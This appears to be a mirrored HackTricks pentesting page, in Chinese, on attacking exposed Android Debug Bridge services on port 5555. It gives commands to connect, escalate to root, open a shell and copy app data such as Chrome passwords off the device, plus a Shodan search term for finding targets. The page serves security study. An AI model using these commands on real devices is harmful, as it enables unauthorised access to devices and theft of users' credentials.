mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-29 16:10:54 +00:00
3.5 KiB
3.5 KiB
5555 - Android Debug Bridge
{% hint style="success" %}
学习与实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE)
学习与实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 关注 我们的 Twitter 🐦 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。
基本信息
来自 文档:
Android Debug Bridge (adb) 是一个多功能命令行工具,允许您与设备进行通信。adb 命令促进了各种设备操作,例如 安装和调试应用程序,并提供 访问 Unix shell 的功能,您可以使用它在设备上运行各种命令。
默认端口:5555。
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
连接
如果找到设备上运行的 ADB 服务并且可以连接到它,你可以在系统内部获得一个 shell:
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
为了完全下载应用程序的数据,您可以:
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
您可以使用此技巧来检索敏感信息,例如 Chrome 密码。有关此信息的更多信息,请查看提供的参考资料这里。
Shodan
android debug bridge
{% hint style="success" %}
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看订阅计划!
- 加入 💬 Discord 群组或电报群组或关注我们在Twitter 🐦 @hacktricks_live.
- 通过向 HackTricks和HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。